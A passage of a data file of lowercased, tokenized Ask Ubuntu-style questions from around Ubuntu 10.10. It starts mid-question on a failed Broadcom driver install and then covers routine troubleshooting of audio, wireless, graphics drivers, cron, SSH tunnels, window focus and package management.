processing bcmwl-kernel-source ( -- install ) : subprocess installed post-installation script returned error exit status 10 setting up libmail-sendmail-perl ( 0.79.16-1 ) ... processing triggers for install-info ... setting up intltool-debian ( 0.35.0+20060710.1 ) ... setting up po-debconf ( 1.0.16 ) ... setting up quilt ( 0.48-5 ) ... processing triggers for doc-base ... processing 4 changed doc-base file ( s ) ... registering documents with scrollkeeper ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : dpkg-dev g++-4.4 libstdc++6-4.4-dev build-essential debhelper g++ broadcom-sta-source bcmwl-kernel-source the xz-utils package would not install separately either . is there any way to solve the dependency problem , or an easier way to configure the wireless card ?
8348	osd desktop-clock that does not get in your way ?	is there a clock application , that can be placed on your screen like a widget staying always on top but automatically fades away on mouseover enabling you to click through it on items below , ( behaves pretty much like the ubuntu notifications in that sense ) . i am aware , that there are screenlets and gdesklets widget apps , but those are buggy , look outdated , and do not comply with the criteria listed above . what i have in mind is a clock that is large , ( digital ) , always visible ( on top of all other windows ) , and does not disrupt your work ( e.g . you can still click that scroll bar or button if it is just below the clock , since the clock fades away on hovering ) . a tool called `` osd-lyrics '' that show lyrics for songs and behaves exactly the way i described above . so it should be possible ( and even easier ) to do the same with a clock .
8350	tomboy notes panel no longer shows note titles after upgrade from lucid to maverick	in lucid , tomboy notes had a panel icon that , when clicked on , would show a list of the most recent notes . you could click the little pushpin icon next to a title to make it show up all the time , no matter how many notes had been added after it . since upgrading to maverick , the icon no longer displays the note titles , so i have no way of knowing which note i 'm clicking on . any ideas on how to fix this ?
8351	how do i list new drives so i can partition and format them ?	i added a bunch of drives to an external enclosure and attached it to a server via esata and now need to get them ready for software raid . however they do not appear under fdisk -l i 've tried looking in /dev/disk/by-path and /dev/disk/by-id . the raid card appears in dmesg . plugging and unplugging the esata enclosure does not cause anything to `` happen '' when i tail /var/log/syslog there is a decent chance that the esata card i am using in the machine is faulty ( i found it laying around ) . but before i purchase a new one i want to make sure i am not missing anything obvious .
8352	how do i downgrade apt ?	today i did my typical `` update all '' routine when the package manager gui told me many things needed updating . it chugged along and needed some confirms . i rebooted because one of the upgrades had stripped all the chrome off my windows making them look old-school x . after the reboot i have a red triangle in my system tray telling me my package info is outdated . odd , since i just ran a big update . now if i go to the command prompt and run apt-get update i get the following : jal @ jal : ~ $ sudo apt-get update [ sudo ] password for jal : 0 % [ working ] /usr/lib/apt/methods/http : symbol lookup error : /usr/lib/apt/methods/http : undefined symbol : _z14maybe_add_authr3uriss e : method http has died unexpectedly ! e : sub-process http returned an error code ( 127 ) throwing a little google foo around i came up with this bug report from dec 2009 on the debian list . it seems the proposed fix in that bug report is to downgrade to apt-0.7.23.1 , apt-get update , and upgrade apt again . i usually just run into things like this without asking for help , but when the package manager is involved i get just a little cautious . i do n't really want to blow my packages up or do something ugly to my system . so in short , how do i downgrade apt without screwing myself in the process ?
8356	how to drag and drop files to a places applet . ( like trash can )	i made a shortcut to my home folder by dragging and dropping it to the panel . is there a way that i can drag and drop files to that applet in order to save the file in the folder location ? what i really want is to make a shortcut to one of my ubuntu one folders , that when i drag and drop a file , selected text or url to that applet , it saved the dropped 'element ' in the folder for synchronization purposes . edit like the trash can but with a custom selected folder .
8360	how to make clock applet show `` fuzzy '' time ?	how to make the gnome panel clock show time in `` fuzzy '' format ? e.g . `` it 's morning '' . i think it was present in kde in the good ole times . not sure about now .
8361	how can i type curly braces while using the tty ?	when i 'm running on battery , i prefer to use the ttys instead of the full blown gui as i can squeeze a lot more run time out this way . however , when i want to type in curly braces ( altgr-shift-ă¨ and altgr-shift-+ on my italian keyboard ) the tty ( and only that tty ) acts as if i was holding my alt key . i also get this problem for any altgr-shift key combination -- the curly braces are just the most commonly used for me . why is that ? how can i prevent it ? here 's my output for stty -a : speed 38400 baud ; rows 48 ; columns 160 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = < undef > ; eol2 = < undef > ; swtch = < undef > ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; - parenb -parodd cs8 hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon ixoff -iuclc -ixany -imaxbel -iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon -iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke
8362	setting up audio on a server install	i 'm running on a clean install of 10.10 server edition and have alsa-base , alsa-tools , alsa-utils , alsaplayer , and alsa-firmware-loader installed . at one point i installed pulseaudio , but i have since removed it . i 've tried the following lspci | grep audio 00:1f.5 multimedia audio controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 01 ) 01:06.0 multimedia audio controller : creative labs [ sb live ! value ] emu10k1x aplay -l aplay : device_list:235 : no soundcards found ... alsamixer can not open mixer : no such file or directory when i search for modules with find /lib/modules/`uname -r` | grep snd i do get a list of modules i 'm not very experienced with alsa setup , so i 'm not sure where to go from here
8363	diff'ing different versions of the same debian package	is there any way to get source diffs between a locally-installed package and its updated one ? this will be useful to check exactly which parts have been fixed , changed or added . for example , say you have the linux-libc-dev package installed on your system and sudo apt-get update & & sudo apt-get upgrade shows the following packages will be upgraded : linux-libc-dev but you want to check , before upgrading it , the exact changes that have been made compared to your local version of the same package . how can we do it ?
8367	run notepad++.exe from terminal	how can i run notepad++.exe from terminal ? it 's located under /home/jon/.wine/drive_c/program files/notepad++/notepad++.exe but when i execute sudo /home/jon/.wine/drive_c/program files/notepad++/notepad++.exe it returns sudo : /home/jon/.wine/drive_c/program : command not found
8372	disabling empathy balloon	how can i disable empathy 's notification balloon that shows up when someone sends me a message ?
8377	disk utility : what 's the difference between `` unmount '' and `` safe removal '' ?	system > administration > disk utility what 's the difference between `` unmount volume '' and `` safe removal '' ? say you insert a flash drive and open the disk utility ui , if you click on `` safe removal '' you receive an `` error detaching drive '' notification , because it 's busy . you must first click the `` unmount volume '' button , and then follow it with the `` safe removal '' button . a couple questions here : does this mean all these times i 've been `` ejecting '' the drive ( via context menu ) before removing it , i have n't been `` safely '' removing it ? and what are the command line equivalents for the two different operations ? ( this question was somewhat addressed here but the answers seem to contradict what i 'm pointing out about the disk utility options . thanks . )
8380	5.1 sound on encore enm232-6via	only front right and left speaker work , and my 5.1 card , is recognized by ubuntu 10.10 , but i have no option for 5.1 in the profile combo sound - > hardware i have tried default-sample-channels = 6 without success . this is lshw output : *-multimedia description : multimedia audio controller product : vt1720/24 [ envy24pt/ht ] pci multi-channel audio controller vendor : via technologies inc. physical id : 8 bus info : pci @ 0000:00:08.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=ice1724 latency=32 resources : irq:17 ioport : f800 ( size=32 ) ioport : f400 ( size=128 ) i have searched up and down for a solution with no luck found something else , sound comes out from 3 jacks but they all have the same left and right channel . also one of the jacks is supposed to be line-in
8381	fans revs up after suspend	whenever i come back from suspend , the fan spins at full speed for about 2 minutes before it clams down . it will do this regardless of load on the cpu . and the laptop just came back from a ( potentially long ) suspend so it is n't hot . at all . after two minutes or so , the fan goes back to normal and then responds to load as you would expect . how can i get it to not do this ? edit : this is on an hp pavilion dv6000
8384	is there code folding for gedit ?	does anyone know about a way to get code folding in gedit , i 've found this plugin in google code , but looks like dead and does n't work with the latest gedit . any idea is wellcome
8385	how to disable slider on game pad ?	i have a gamepad that works fine in ubuntu ( from a technical point-of-view ) , but the slider on the gamepad is malfunctioning . i would like to simply disable the slider globally so that all applications do n't see that the slider exists . is there a configuration file or something i can edit to do this ? edit : any advice , clues , or pointers in the right direction would be appreciated ... ( such as explaining how ubuntu manages gamepad configurations . )
8389	vmware no longer compiles after upgrade	i used vmware on ubuntu 10.04 for quite a while . when 10.10 was released i did a clean install . i tried to reinstall vmware , but after installing , i was n't able to compile the modules . does anybody know how to fix this ?
8390	i keep getting this request for a yahoo messenger buddy on empathy same person every time i log in ?	i am not sure this belongs here , if not tell me and i will delete this question , but i was wondering could this be a bug with yahoo not getting the denial from empathy ?
8394	i ca n't find gnome-system-tools in gconf-editor	i 'm trying to turn on fix show all users in the gnome configuration editor . all the sites i 've found say to go to apps - > gnome-system-tools - > users , only i 'm not seeing gnome-system-tools anywhere . any ideas ?
8400	why is flash performing so badly in 10.10 64-bit compared to 10.04 64-bit ?	edit : after discovering some more about the problem ( namely that it seems to be caused by waking from suspend ) i created a new question . in ubuntu 10.04 64-bit , i was running the latest 64-bit flash beta with google chrome 64-bit ( stable ) and i was seeing smooth performance ( even in full screen ) , extremely reasonable cpu usage , and no issues with lock-ups . compared to my macbook , the experience was remarkably better . it even solved the issue where hitting volume keys would kick me out of full-screen mode . in 10.10 , with ( to my knowledge ) exactly the same setup , i 'm getting ridiculous cpu usage , and full screen performance has gone from perfect to unusable ( this is happening because it 's flooring a 4-core i5 processor窶馬o small feat ) . i 'm also back to not being able to hit the volume keys without kicking flash out of full screen and showing a frozen video player until i scroll the window , something that i fixed in 10.04 from overriding the built-in system flash install ( which i think was the 32-bit version with npviewer ) with the latest beta . this is on a completely fresh install on a lenovo x201 ( no proprietary drivers ) . anyone have any clue what 's going on ? this is pure speculation , but it feels like this has something to do with hardware acceleration not kicking in properly ( the spike in cpu usage would support this ) . thanks ! edit : some more details : i 've noticed that embedded youtube players flicker annoyingly often , even outside of full-screen mode , which does n't happen on youtube pages . also , even html5 videos on youtube , when put into full-window mode , are somewhat choppy . movie player does n't miss a beat when playing 1080p videos , so it 's possible that this is a chrome rendering problem , not necessarily a flash problem .
8402	how can i change the default port of remote desktop ( vnc ) ?	let 's say i went to : system > preferences > remote desktop and enable remote desktop . now let 's say i have another machine on the network that is also running a vnc server . i want to vnc into my network from the outside , but i need each vnc server to be running on different ports . how can i change ubuntu 's default port for remote desktop/vnc ?
8404	prores encoding and decoding ?	is there a way to encode/decode prores mov files ( mostly decode ) ? i 've been playing around with ffmpeg and mencoder/mplayer from the ubuntu repos , but they both report that it 's an unknown codec . totem as well . i guess it comes down to getting the right codecs in place . maybe compiling from source ? i have seen a few comments on the internet about getting mplayer/mencoder working with prores files in os x , but i 'm hoping there is a way to do this in ubuntu .
8406	how do i make my prism2-based wireless card work ?	i have a somewhat generic prism2-based wireless card plugged into a pcmcia adapter . in lucid it was working with orinoco_cs , or at least that 's what it does when i boot maverick with the lucid kernel . however the maverick kernel gives a message about orinoco_cs being disabled for prism2 cards because the hostap driver supposedly supports them better . it does look like the hostap driver is loading , and i get two devices responding to iwconfig , named wifi0 and wlan2 . however they wo n't seem to connect to the access point . i am using manual configuration via /etc/network/interfaces and the command line . at one point when the interface was down i saw iwconfig report that wlan2 had in fact connected to the access point , but when i ran ifup wlan2 it disconnected from the ap and the rate changed back to 2m . the encryption key in the interfaces file is the same one i gave on the iwconfig command line . further command line poking did not seem to get things associated . what am i missing ?
8409	autoconnecting bluetooth devices	is there a way to set the bluetooth in ubuntu to autoconnect to devices it is paired to when it is turned on . furthermore , is there a way to automatically change the sound output to a bluetooth headset on connection ?
8413	can i specify what characters set the double-click selection boundary in gnome terminal ?	when i double-click to select text in gnome terminal , the selection stops at spaces but continues over hyphens : some of my filenames contain uncommon characters such as the heavy teardrop-spoked asterisk and are not selectable by double-clicking : is there a way to make double-click selection continue over these characters as well ?
8414	why does redirection to the same file truncates the file ?	normally we use a different file to redirect the output . for example : cat < first > temp in this command the contents of first are redirected to temp instead of the standard output . then why does it truncates the file if i use the same file name ? why ca n't it overwrite the same file ? cat < first > first thanks .
8416	how can i preserve the executable bit on a file that is synchronized by ubuntu one ?	a script i am working on is in a folder that is synchronized by ubuntu one . every time i edit it from another computer , it looses its executable bit and i must manually reapply chmod +x . how can i avoid having to repeatedly set this ?
8425	how to temporarily disable pulseaudio ?	just wondering if there a way to temporarily disable pulseaudio as i am trying to run a specific wine game ( left 4 dead 2 ) and it makes the game crash occasionally . if i kill the process it automatically comes back up . any suggestions ?
8426	cron.hourly wo n't run	ok , so i 've made my script , i dropped it in /etc/cron.hourly then i chmod 777 the file but it wo n't run ( automatically ) . if i manually run it , it works fine . do i need to do anything else ?
8434	connecting a ssh tunnel on reboot ?	how can i reestablish a tunnel if my localhost goes down ? i have 2 machines , remotehost and localhost , on my localhost im running autossh to keep the tunnel alive in case of network problems . autossh -m 20000 -l 3300:192.168.2.101:3306 -r 3000:192.168.1.3:3000 disp @ 192.168.2.100 -p 80 but what if i need to reboot the localhost ? how do i auto reconnect the tunnel then ?
8435	how can i calibrate the touch screen and stylus on hp pavillion tx 2500 ?	i installed kubuntu 10.10 on a hp tx2675ee tablet pc ( tx2500 series - single touch not multi touch ) . the touch screen and stylus both work out of the box , however the touch screen is way off calibration wise and the stylus is just a bit out of whack . how do i calibrate these input methods ? there are posts here and elsewhere referring to editing this path : /usr/lib/x11/xorg.conf.d/10-wacom.conf , but on kubuntu 10.10 i ca n't find that file or it 's parent directory . thanks .
8437	is there a good mono-spaced font for devanagari script in the terminal ?	all the terminal fonts i have tried result in inaccurate rendering of the devanagari sript ( and/or roman script ) in the terminal in the devanagari script , a vowel binds itself to a preceding consonant . this type of vowel does not exist on its own . the dotted circle indicates that it requires a preceding consonant ... here is an example of an as yet unattached vowel : vowel sign o' proper font rendering does the work of grafting the consonanat to the vowel , and should remove all visible signs of the dotted-circle ... . ... but i ca n't find a terminal font which renders both the roman script and devanagari scripts satisfactorily . actually , the dotted-circle still shows for all devanagari fonts , and the roman script is not rendered properly for many of those fonts ; eg . in the word `` primer '' , about 40 % of the `` e '' overlaps the `` m '' . is there some way around this ? does anyone know of a suitable font ? ... mono-spaced is preferred . or is it something to do with the ubuntu - gnome-terminal setup ? update 2 : i tried the same text in opensuse ( gnome-terminal ) : it failed worse than ubuntu . i tried the same text in fedora ( konsole ) : it rendered perfectly ! but that 's fedora , and i 'm using ubuntu : ( okay , then next obvious step : i installed konsole in ubuntu : it rendered perfectly ! but that 's konsole , and i 'd rather stay in the gnome family ... and konsle 's menu does n't respond to keyboard ... and if ubuntu+konsole can do it , then there is probably a way ubuntu+gnome-terminal can ... update 1 : as suggeseted , here are some examples . the devanagari looks okay here , but not in the termainal ( the .png below shows the monospace font ) 30 - uncle moon – चंदा मामा/20081119 hindi primer part 30 - uncle moon – चंदा मामा.nag 31 - rain queen - वर्षा रानी/20081124 hindi primer part 31 - rain queen - वर्षा रानी.nag actually , none of the devanagari-aware fonts render correctly ! ... and some of the the roman script rendering can get pretty whacky . all entries from the command $ locale are set to `` en_au.utf-8 '' , but even setting everything to `` hi_in.utf-8 '' makes no difference
8441	how to install 3g mobile broadband ?	i never install 3g mobile broadband inside ubuntu since i 'm using lucid and till now , maverick how to make it run ? i 've tried so many ways to make it happen but still get the same result . its only blinking but my ubuntu does detect nothing . i already install usb-modeswitch , but nothing still happen , the modem is n't being detected at all
8442	after song # 6 i get the first 5 songs but in inverted order with rhythmbox	i noticed an oddity in rhythmbox last.fm integration . namely , when i load a radio station `` similar to artist xx.yy '' the player loads a list of ten songs , but from # 6 to # 10 they are a repetition of # 1 to # 5 in inversed order . is it a problem with rhythmbox ?
8444	stupid simple music player ?	here 's what i want : i have a folder with mp3 files . i would like to play all the files in the folder , alphabetically . and i need a way to pause , skip to next file , and that 's pretty much it . i do n't want to use my music player to organize my music library , i do n't need connection to network services , and i do n't even need id3 support . on windows , winamp 2 did what i wanted . what 's my best option on ubuntu ?
8445	10.04 > 10.10 upgrade and the splash screen hangs	i have a computer that once i upgraded from 10.04 to 10.10 the splash screen hangs . i had this issue on another machine that i simply boot into recovery mode and reinstalled the nvidia drivers ( both have nvidia cards ) . the thing is , on the machine i 'm presently having issues with , when i select recovery mode , the monitor tells me `` no signal '' any help would be greatly appreciated , this is a friend 's laptop needed for university .
8447	mount error during boot up	i get the following error during boot up . but this error does n't get written to boot.log , as it happens in early boot stages . mount : mounts none on /dev/pts failed : device or resource busy i found this code in /etc/init.d/umountfs file ( there is an entry for /dev/pts in it ) protected_mounts= '' $ ( sed -n '0 , /^\/ [ ^ ] * \/ /p ' /proc/mounts ) '' weak_mtpts= '' '' # be gentle , do n't use force reg_mtpts= '' '' tmpfs_mtpts= '' '' while read -r dev mtpt fstype rest do echo `` $ protected_mounts '' | grep -qs `` ^ $ dev $ mtpt `` & & continue case `` $ mtpt '' in /|/proc|/dev|/.dev|/dev/pts|/dev/shm|/dev/.static/dev|/proc/* $ continue ; ; /var/run ) continue ; ; /var/lock ) continue the file /etc/init.d/umountnfs.sh also has a similar entry . so if i remove the entry /dev/pts will it solve my issue ( the mount error getting displayed at boot up ) . here are the contents of mtab file : /dev/sda1 / ext4 rw , errors=remount-ro , commit=600 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 rpc_pipefs /var/lib/nfs/rpc_pipefs rpc_pipefs rw 0 0 /dev/sda6 /media/windisk fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/blandman/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=blandman 0 0
8452	font viewer for font collectors ?	i have a huge font collection and would like to be able to view them in an efficient manner rather than opening a file one by one . what would be the best font viewer aside from fontypython , which unfortunately has a mojibake bug on fonts with multibyte characters .
8454	sound volume after boot always at loudest level	i installed 10.04 a couple of weeks ago . my primary os is windows and i could not install linux up until very recently because of lack of hardware support for my notebook . 10.04 is the only distribution that i managed to get to install on my notebook , but my problem is , that even though i set the volume at a low level , every time after booting and login into ubuntu , the sounds will play at the highest volume . the volume indicator will still show the low volume setting , but sounds play at the highest volume until i click the volume setting again manually is there a config-file i need to update to fix this , or is it a known bug ? anybody had the same problem ?
8456	mass re-tagging of music files	my collection of music files has grown organically over the years , and it has no consistent tags nor file names . especially , older files may have weird id3v1 tags or no tags at all , which makes them inconvenient to use with tag-based browsers ( like the `` music catalog '' display of rhythmbox ) . can you suggest any good program for mass re-tagging of the files ? ideally , i would like the following features in a re-tagging program : it lets me choose an arbitrary set of files and re-tag them all , updating tag values selectively ( e.g. , only update `` artist '' ) it can populate tag values from the filename or the containing folder name ( e.g. , for files organized like < album > / < track no. > - < song name > ) it can detect whether there are inconsistencies between id3v1 and id3v2 tags ( e.g. , the song title is different in the two versions ) it lets me search for songs on cddb or musicbrainz and then use the fetched metadata to populate the tag values . bonus points if it has a two-step approach : first populate tag values from filename or musicbrainz , then let me edit them , finally re-tag files . i understand that 1. and 2. are pretty standard , but what about points 3.-5. ?
8458	how to update ubuntu terminal ?	how to update ubuntu terminal ?
8467	auto-login to console as root - no xserver	i 'm setting up a pc for a very specific purpose . it 's going to do some stuff deep underwater ... round about 3km . we do n't fear fish hijacking the box locally ; ) . i 'm trying to set up a login : no xserver . works well ... i edited gdm.conf not to start . great : that 's how linux is supposed to be in the first place . now my next and last task is : get the login . i googled upstart , event.d - my 10.4 distribution i recently installed does n't have this or it does n't work like i expect . i want the box to boot and to provide a local root shell . just that ... how is this possible ? edit : possible tags : headless , auto-login . ca n't set that ... .
8469	nvidia 96 not working in maverick	i recently upgraded to maverick and x stopped working . i used to run nvidia-96 , but now when i modprobe nvidia i 'm getting the following error : fatal : error inserting nvidia ( /lib/modules/2.6.35-22-generic/kernel/drivers/video/nvidia.ko ) : no such device installing 96-series driver from nvidia.com yields the same result . i also tried to run on nouveau drivers , but it can only give me 640x480 resolution , which is not acceptable . graphics card details are : # lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation nv18 [ geforce4 mx 440 agp 8x ] [ 10de:0181 ] ( rev a2 ) is there any ppa with updated driver ?
8470	embedded pdf readers do n't recognise keyboard input	since upgrading to 10.10 none of evince , okular or xpdf recognise up/down , pageup/pagedown keys when working as a pdf reader embedded in firefox . i had this problem before ( 10.04 ) with okular , which was part of the reason i switched it back to evince ( i also do n't like the kde save file thing in okular ) . but now i have the same issue in evince as well even after switching back to evince . [ why does ubuntu insist on making okular the default , even on gnome ? ] so : how do i make my pgup/pgdn keys work with embedded pdf readers ?
8471	can i migrate a virtualbox ubuntu guest to a *real* hardware box ?	i want to transfer ubuntu from a virtualbox guest 'appliance ' to a real ( metal and chips ) computer ? can this be done , and what steps are involved ?
8474	what is 'compositing ' ?	i have compiz enabled and use the 3d desktop cube with rotation as long as various cool minimize animations . recently when i boot the computer , docky has been telling me to 'enable compositing ' . i do n't know what compositing is ! docky is working fine as it always has been though , so i do n't know why it is suddenly asking me this ( i 'm guessing it is confused and that it is actually enabled but i 'm not sure ) . so what is compositing and is it enabled because i am using compiz or is it something different ? what does 'compositing ' mean exactly ?
8475	how can i tell update manager not to update a package ?	i 'm using 10.04 and have installed virtualbox 3.2.10 ( not the ose one , but the .deb file from oracle ) . it has a dependency on libqt4-opengl which depends on qt version 4.6 , but the update manager wants to update to qt 4.7 and remove virtualbox . how do i keep it from doing that so that i can get the rest of the updates ?
8478	what is causing my spacebar to randomly stop working ?	a couple of times a day , i 'll be typing something and realise i ca n't type spaces . usually the cursor will flicker instead when i press the spacebar , and i can type all other letters as far as i can tell . if i 'm in a terminal the cursor turns from a solid square to an empty square until i release the spacebar . for some reason , restarting compiz with alt-f2 compiz fixes it , until it next occurs . i can still copy and paste spaces from sources that already have them , and i can still insert spaces with ctrl-shift-u , 20 , enter . this has been happening for a while , since before i upgraded to maverick , but it feels like its beceoming more frequent . there really does n't seem to be any kind of a pattern to it . i 'm using 64 bit ubuntu 10.10 on a system76 panp7 laptop . any ideas how i might troubleshoot ? edit : using xev , normally a spacebar registers as : keypress event , serial 36 , synthetic no , window 0x5600001 , root 0x101 , subw 0x0 , time 26488647 , ( 88,403 ) , root : ( 748,458 ) , state 0x10 , keycode 65 ( keysym 0x20 , space ) , same_screen yes , xlookupstring gives 1 bytes : ( 20 ) `` `` xmblookupstring gives 1 bytes : ( 20 ) `` `` xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x5600001 , root 0x101 , subw 0x0 , time 26488729 , ( 88,403 ) , root : ( 748,458 ) , state 0x10 , keycode 65 ( keysym 0x20 , space ) , same_screen yes , xlookupstring gives 1 bytes : ( 20 ) `` `` xfilterevent returns : false but when it 's stopped behaving a press of the spacebar instead gives the three events : focusout event , serial 36 , synthetic no , window 0x5600001 , mode notifygrab , detail notifyancestor focusin event , serial 36 , synthetic no , window 0x5600001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 36 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 further edit : ok , so i think i 've solved the problem , and by that i mean i now know which package to file a bug against . i have a hot corner which initiates a window picker , and i 've customised the window picking so that left click goes to a window , right click closes one and spacebar zooms in on one . when i go to this hot corner , compiz must take control of my spacebar , and clearly is n't giving it back when i leave the window picker . so i 'll be filing a bug against compiz . reported : here
8482	regex on the shell ?	i wanted to do some simple regex so i am trying to get the 16 . i tried grep but i dont see how to write \1 or $ 1 to only output the capture data and i tried sed but i think i did it wrong due to escaping i am not familiar with . anyways my regex is this ( \d+ ) \ % \s*/ $ the string is # df filesystem 1k-blocks used available use % mounted on /dev/xvda 15997904 2404540 12943248 16 % / tmpfs 252456 0 252456 0 % /lib/init/rw tmpfs 252456 36 252420 1 % /dev/shm and on this site the output is exactly what i want ( move your mouse over to see group matches ) http : //regexr.com ? 2sd12
8483	start transmission in the background	is there a command i can use to start trasmission in the background ? i added trasmission to the list of aplications started at startup . every time after log in the the trasmission window pops up and this is bugging me .
8485	how can i fix corrupted icons on task bar ?	just installed kubuntu and corrupted application icons appear randomly on my task bar . does it happen to anyone else ? here 's how it looks like :
8494	prevent windows from stealing focus	i 'm using maverick with compiz enabled . i 've searched askubuntu and google . askubuntu does n't have anything on this topic and everything google turns up is a couple years old . i 'm doing browser tests and my tests are constantly spawning new firefox windows . the problem is , when the window is spawned it takes focus . this is incredibly annoying as i 'm usually in the middle of typing somewhere else . this does n't only happen with my tests , but is the most common example i run into . sometimes my ide decides it wants focus when something special happens ( like when something is done compiling ) and then later i 'll find fragments of im messages i 've typed in my code . this is driving me crazy . i 've looked in both gnome settings and compiz settings and ca n't find a way to prevent that from happening . does anyone know of a way to prevent an app from stealing focus when it is opened ? i 'd rather have the taskbar flash at me or something to get my attention .
8498	how can i make the draggable window border thicker , without changing the appearance ?	when you want to resize a window in gnome ( as well as in other systems ) you can click-and-hold at the window 's border and than drag it . the problem is ( and do correct me if i 'm wrong here ) that the draggable border is just a couple of pixels thick in gnome . that tends to be a little frustrating , and contributes to my wrist pains from using the mouse , as it requires very careful movement of the mouse . how can i change the thickness of the area i can click in order to resize a window ? i do n't want to increase the appearance of the window border , i 'm not talking about eye candy here . i want to fine tune this functionality where i can resize a window by dragging its border . is there a setting somewhere that will change this ?
8501	why hulu.com videos are choppy but youtube 's are okay ?	i have a friend who recently installed wubi and he mentioned that hulu.com videos are choppy ( to the point of being unwatchable ) whereas youtube is fine for him . i also have the same version of ubuntu ( 10.4 ) ( although , i have a regular install , not wubi ) and i never have problems with hulu.com . i asked if he ever installed flash and he said `` no , it played out of the box without needing to do anything '' . what can i do to help him ? should i have him run adobe 's flash installer ? i think , ( but am not sure ) that i did that on my machine , previously . does hulu.com even use flash ? one point to mention is that he is running on a laptop , and i am running from a desktop .
8505	wifi not switching on !	i 'm using ubuntu 10.10 on an hp dv4 and my wifi was working just fine ( except the wifi led blinking ) till yesterday . now when i touch the wifi button it just wo n't switch on ! ! ! : o i did n't make any changes yesterday but updated my system today . i have no idea what happened . any clue ? ? ? i ran the command sudo lshw and got its output as : *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 90:4c : e5:58:14:34 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=2.6.35-22-generic firmware=n/a latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory:96400000-9640ffffmemory:96400000-9640ffff the network is disabled ? ! ? : o i tried to enable it by right clicking on network manager but the enable wireless button has been greyed out . i opened the file /var/lib/networkmanager/networkmanager.state and found that the contents are [ main ] networkingenabled=true wirelessenabled=false wwanenabled=true i tried to change wirelessenable=false to wirelessenabled=true but after reboot it resumed back to the same state .
8506	decrease mouse sensitivity below the standard limit	i 've got a usb mouse attached to my ubuntu notebook . this mouse is ( unfortunately ) really sensitive , and so it sometimes gets hard to hit small icons with the mouse pointer . this is really a hardware issue , it 's not a bug and it 's not ubuntu's/gnome 's fault . still , i would very much like to this issue through software ( solving through hardware would imply buying a new mouse ) . back in windows , if i set the sensitivity as really low it was comfortable enough . in ubuntu , even the lowest sensitivity and acceleration available ( in the system > prerences > mouse menu ) is still frustrating . how can i decrease it below the default minimum ? i tried xset , but it seems xset only deals with acceleration and threshold , but not actual sensitivity .
8508	rss torrent software	in windows i used an rss feed to download a tv series , but deluge doesnt have that option . is there a plugin to add that fuction ? how do i install and configure it ? if there is n't a plugin which client do you recomend ?
8516	how do i install mp3pro support ?	i 've been listening to some of my older music today and i 've just come across an album that i ripped back in my 'mp3pro days ' ... needless to say it does n't sound very good , which i 'm guessing is because rhythmbox falling back to normal mp3 ( at only 96kbps ) instead of playing the mp3pro 'extras ' so it sounds tolerable : ) are there codecs that i can use to get mp3pro sounding less horrible or an alternative music player that supports the format ? alternatively , does rhythmbox already support the format and i 'd just not realised how bad it sounds before ? obviously i 'll re-rip it if it comes to that , but it 's a hassle i 'd rather avoid . ( especially since i have quite a few of them ) thanks !
8517	is it possible to install maverick into an existing luks partition ?	i 'm about to do a re-install of maverick on a laptop with an existing installation that 's in an encrypted ( luks ) partition . ( i 'm re-installing because it 's currently an xfs filesystem in there , and i 'm trying to determine if xfs is the reason disk performance is so incredibly bad . ) the normal desktop installer of course does n't know what that partition is , and the `` advanced '' tool does n't appear to provide me any way of telling it . i 'm downloading the `` alternate '' iso now , but i 'm curious ( for the next time i go through this ) to know whether there is some trick to doing that with just the plain `` desktop '' iso .
8518	what is blcr and why does it fail to update ?	evert time the kernel is updated by apt-get upgrade , i can see the following among the output : run-parts : executing /etc/kernel/header_postinst.d/dkms 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic * dkms : running auto installation service for kernel 2.6.35-22-generic * blcr ( 0.8.2 ) ... [ fail ] * virtualbox-ose ( 3.2.8 ) ... [ ok ] what can be the problem with blcr and what should i do ?
8523	what 's a software that can join videos ?	what 's the best & easiest gui software that can join a video that i have downloaded in several parts ?
8534	share files and printer between two ubuntu boxes	i have two ubuntu boxes and want to share files and printer between them . i 'm reading about samba but i have a question : is samba only for sharing thing between ubuntu and windows ? another question : there is a lot of information describing hot to share files and printer between ubuntu and windows , but what about two ubuntu boxes ? how can i do that ? is there how-to i can follow ?
8536	evolution will not allow me to download e-mails from exchange server	any ideas that might help me ? when i go to create a new account i select exchange under the server type . i am not sure which plugin this is using , i do know what it has worked in the past though ... so as far as i know the server should be set up to work .
